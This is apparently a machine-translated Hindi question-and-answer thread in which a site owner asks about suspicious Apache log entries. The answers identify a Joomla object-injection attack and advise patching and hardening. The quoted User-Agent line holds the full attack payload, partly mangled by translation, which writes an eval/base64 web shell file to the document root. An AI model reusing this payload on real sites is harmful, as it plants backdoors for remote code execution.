क्या उपयोगकर्ता-एजेंट पहचान का उपयोग कुछ स्क्रिप्टिंग हमले तकनीक के लिए किया गया था?


10

मेरी साइट पर अपाचे प्रवेश लॉग प्रविष्टियाँ आमतौर पर इस तरह होती हैं:

207.46.13.174 - - [31 / अक्टूबर / 2016: 10: 18: 55 +0100] "GET / संपर्क HTTP / 1.1" 200 256 "-" "मोज़िला / 5.0 (संगत; bingbot / 2.0; + http: // www) .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607

इसलिए आप उपयोगकर्ता-एजेंट फ़ील्ड को वहां देख सकते हैं। लेकिन आज मुझे उपयोगकर्ता-एजेंट फ़ील्ड भी इस तरह से मिला:

62.210.162.42 - - [31 / अक्टूबर / 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ परीक्षण | O: 21: 21:" JDatabaseDriadMysqli ": 3: {s: 2 : "एफसी"; हे: 17: "JSimplepieFactory": 0: {} रों: 21: "\ 0 \ 0 \ 0disconnectHandlers", एक: 1: {मैं: 0; एक: 2: {मैं: 0; हे: 9: "SimplePie": 5: {s: 8: "स्वच्छ", हे: 20: "JDatabaseDriverMysql": 0: {} रों: 8: "FEED_URL"; s: 242: "file_put_contents ($ _ सर्वर [" DOCUMENT_ROOT " ] .chr (४ 47)। "sqlconfigbak.php", "= | = \ _ x3C"। x24xsser = base64_decode (\ x24_POST [ 'z0']); @ eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); बाहर निकलें," की: 19: " cache_name_function "की: 6:" ज़ोर "की: 5:" कैश ", ख: 1; रों: 11:" cache_class "; हे: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}}: s: 13:" \ 0 \ 0 \ 0conconection; b: 1;} ~; ~ Ů "0.304 BYPASS 10.10.36.125:104 0.304

क्या यह हमला था? अगली लॉग प्रविष्टि sqlconfigbak.phpस्क्रिप्ट में उल्लिखित सफलतापूर्वक (कोड 200) फ़ाइल को पुनर्प्राप्त करने के लिए प्रकट होती है । हालाँकि मुझे फ़ाइल सिस्टम में फ़ाइल नहीं मिली:

62.210.162.42 - - [31 / अक्टूबर / 2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "मोज़िला / 5.0 (संगत; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244

कृपया यहाँ क्या हो रहा था?

जवाबों:


11

यह एक जूमला 0 डे अटैक है। यहां मिली जानकारी: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

यह __test के बावजूद भेद्यता परीक्षण नहीं है। यह एक हमला है।

सुनिश्चित करें कि कोई भी जूमला स्थापित हो सके।

एक और विकल्प बस उपयोग करना है। एक सामान्य स्ट्रिंग की तलाश में इस शोषण को रोकने के लिए .access, "__test" काम करेगा, और किसी अन्य स्थान पर पुनर्निर्देशित करेगा।


4

आपके द्वारा जोड़ा गया IP पता Google होस्टनाम का समाधान नहीं करता है इसलिए यह Google नहीं है। वह व्यक्ति या बॉट आपकी साइट को कमजोरियों के लिए स्कैन कर रहा है। पहला एक जूमला भेद्यता खोजने का प्रयास है।

ये घटनाएं अधिकांश वेबसाइटों पर एक नियमित घटना हैं, आपको यह सुनिश्चित करना चाहिए कि आप सर्वोत्तम प्रथाओं का पालन कर रहे हैं और अपनी वेबसाइट को सख्त कर रहे हैं, प्रक्रिया लंबी है और आपको एक ऑनलाइन ट्यूटोरियल खोजने और उसका पालन करने की आवश्यकता होगी।


ठीक है धन्यवाद। मैंने इसे खोजने से पहले ही वेबसाइट को सख्त कर दिया। ईमानदारी से, इस तरह के हमले के वेक्टर को देखकर मुझे थोड़ा आश्चर्य हुआ।
21

2

अन्य उत्तरों के अलावा, ध्यान दें कि इस हमले ने स्पष्ट रूप से काम किया है कि यह सुझाव देता है कि आप PHP का पुराना, असुरक्षित संस्करण चला रहे हैं। बग के लिए एक फिक्स कि यह हमला सितंबर 2015 में जारी किया गया था। अपनी अपडेट प्रक्रिया को चलाएं और सुनिश्चित करें कि यह PHP के सबसे हाल के संस्करण में खींचता है। और अन्य पुराने प्रोग्राम जो इंटरनेट का सामना कर रहे हैं, के लिए भी जाँच करें, क्योंकि ऐसा लगता है कि आपके सर्वर को कम से कम एक वर्ष तक अद्यतित नहीं रखा गया है।


धिक्कार है अच्छी बात!
15
हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.